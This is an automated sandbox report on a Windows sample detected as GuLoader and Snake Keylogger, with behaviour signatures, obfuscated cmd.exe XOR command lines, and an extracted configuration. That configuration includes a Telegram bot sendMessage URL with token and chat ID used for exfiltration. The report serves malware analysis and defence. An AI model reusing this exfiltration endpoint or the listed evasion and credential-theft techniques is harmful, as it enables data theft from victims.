Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Revised PI_2024.exe

Overview

General Information

Sample name:Revised PI_2024.exe
Analysis ID:1479211
MD5:92a02307f4c44a671c89b1b3d217d019
SHA1:96c200cc228a4af2d13fdb058974ba669826441f
SHA256:e9b50ec3d579aa6668fcfacf94e2ecfc4e1a7384ad5aae86d2ecfd0ccea52363
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Machine Learning detection for sample
Mass process execution to delay analysis
Obfuscated command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Too many similar processes found
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • Revised PI_2024.exe (PID: 5984 cmdline: "C:\Users\user\Desktop\Revised PI_2024.exe" MD5: 92A02307F4C44A671C89B1B3D217D019)
    • cmd.exe (PID: 4252 cmdline: cmd.exe /c set /a "250^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6332 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6776 cmdline: cmd.exe /c set /a "227^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3276 cmdline: cmd.exe /c set /a "255^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3084 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2804 cmdline: cmd.exe /c set /a "253^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 280 cmdline: cmd.exe /c set /a "130^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3480 cmdline: cmd.exe /c set /a "131^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3928 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5052 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7600 cmdline: cmd.exe /c set /a "242^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5240 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4560 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 840 cmdline: cmd.exe /c set /a "208^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6332 cmdline: cmd.exe /c set /a "197^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6776 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1268 cmdline: cmd.exe /c set /a "247^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3084 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2304 cmdline: cmd.exe /c set /a "221^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1396 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4980 cmdline: cmd.exe /c set /a "240^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1568 cmdline: cmd.exe /c set /a "153^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4668 cmdline: cmd.exe /c set /a "220^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3400 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1940 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4932 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3920 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2704 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6768 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8080 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4684 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4528 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6104 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 600 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8164 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4684 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4864 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1420 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1608 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3692 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5052 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6812 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6424 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7596 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4728 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7624 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6412 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4344 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6248 cmdline: cmd.exe /c set /a "193^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2544 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6660 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6104 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1404 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6876 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1248 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6812 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4252 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4344 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6248 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2544 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 624 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3920 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 280 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5424 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • Revised PI_2024.exe (PID: 2496 cmdline: "C:\Users\user\Desktop\Revised PI_2024.exe" MD5: 92A02307F4C44A671C89B1B3D217D019)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7403026399:AAFfphUcCNwXUYyJxcHC8R68pFj9jInz4Bk/sendMessage?chat_id=6419839739"}
{"C2 url": "https://api.telegram.org/bot7403026399:AAFfphUcCNwXUYyJxcHC8R68pFj9jInz4Bk/sendMessage"}
SourceRuleDescriptionAuthorStrings
00000083.00000002.86892585605.000000003418C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000083.00000002.86892585605.00000000340B6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000000.00000002.82255738297.00000000004F1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
        00000000.00000002.82255738297.0000000000514000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
          00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            Click to see the 7 entries
            No Sigma rule has matched
            No Snort rule has matched
            Timestamp:2024-07-23T12:54:26.900562+0200
            SID:2853006
            Source Port:49841
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000083.00000002.86892585605.0000000033F21000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7403026399:AAFfphUcCNwXUYyJxcHC8R68pFj9jInz4Bk/sendMessage?chat_id=6419839739"}
            Source: Revised PI_2024.exe.2496.131.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7403026399:AAFfphUcCNwXUYyJxcHC8R68pFj9jInz4Bk/sendMessage"}
            Source: Revised PI_2024.exeReversingLabs: Detection: 60%
            Source: Revised PI_2024.exeJoe Sandbox ML: detected

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFB768 CryptUnprotectData,131_2_33EFB768
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFBDF0 CryptUnprotectData,131_2_33EFBDF0
            Source: Revised PI_2024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.11.20:49833 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 192.168.11.20:49839 -> 104.21.67.152:443 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.253.63.113:443 -> 192.168.11.20:49830 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.253.115.132:443 -> 192.168.11.20:49831 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49841 version: TLS 1.2
            Source: Revised PI_2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 0_2_00405464 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405464
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 0_2_00405EA8 FindFirstFileA,FindClose,0_2_00405EA8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_00402645 FindFirstFileA,131_2_00402645
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_00405464 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,131_2_00405464
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_00405EA8 FindFirstFileA,FindClose,131_2_00405EA8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 0015E627h131_2_0015E438
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 0015EFB1h131_2_0015E438
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h131_2_0015E00D
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 0015FA41h131_2_0015F780
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h131_2_0015D7F8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h131_2_0015DE2B
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 33EFFDF7h131_2_33EFFB50
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 33EF15D8h131_2_33EF11C0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 33EF1011h131_2_33EF0D60
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 33EFF99Fh131_2_33EFF6F8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 33EFF547h131_2_33EFF2A0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 33EFF0EFh131_2_33EFEE48
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then mov esp, ebp131_2_33EFDA50
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 33EFEC97h131_2_33EFE9F0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 33EF15D8h131_2_33EF11B7
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 33EFE83Fh131_2_33EFE598
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 33EFE3E7h131_2_33EFE140
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 33EF15D8h131_2_33EF1506
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 33EF0BB1h131_2_33EF0900
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 33EFDF8Fh131_2_33EFDCE8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 33EF0751h131_2_33EF04A0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 33EF02F1h131_2_33EF0040
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360BB043h131_2_360BAD08
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B99F8h131_2_360B9750
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B32AFh131_2_360B3008
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360BA2A7h131_2_360BA000
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B8CC7h131_2_360B8A20
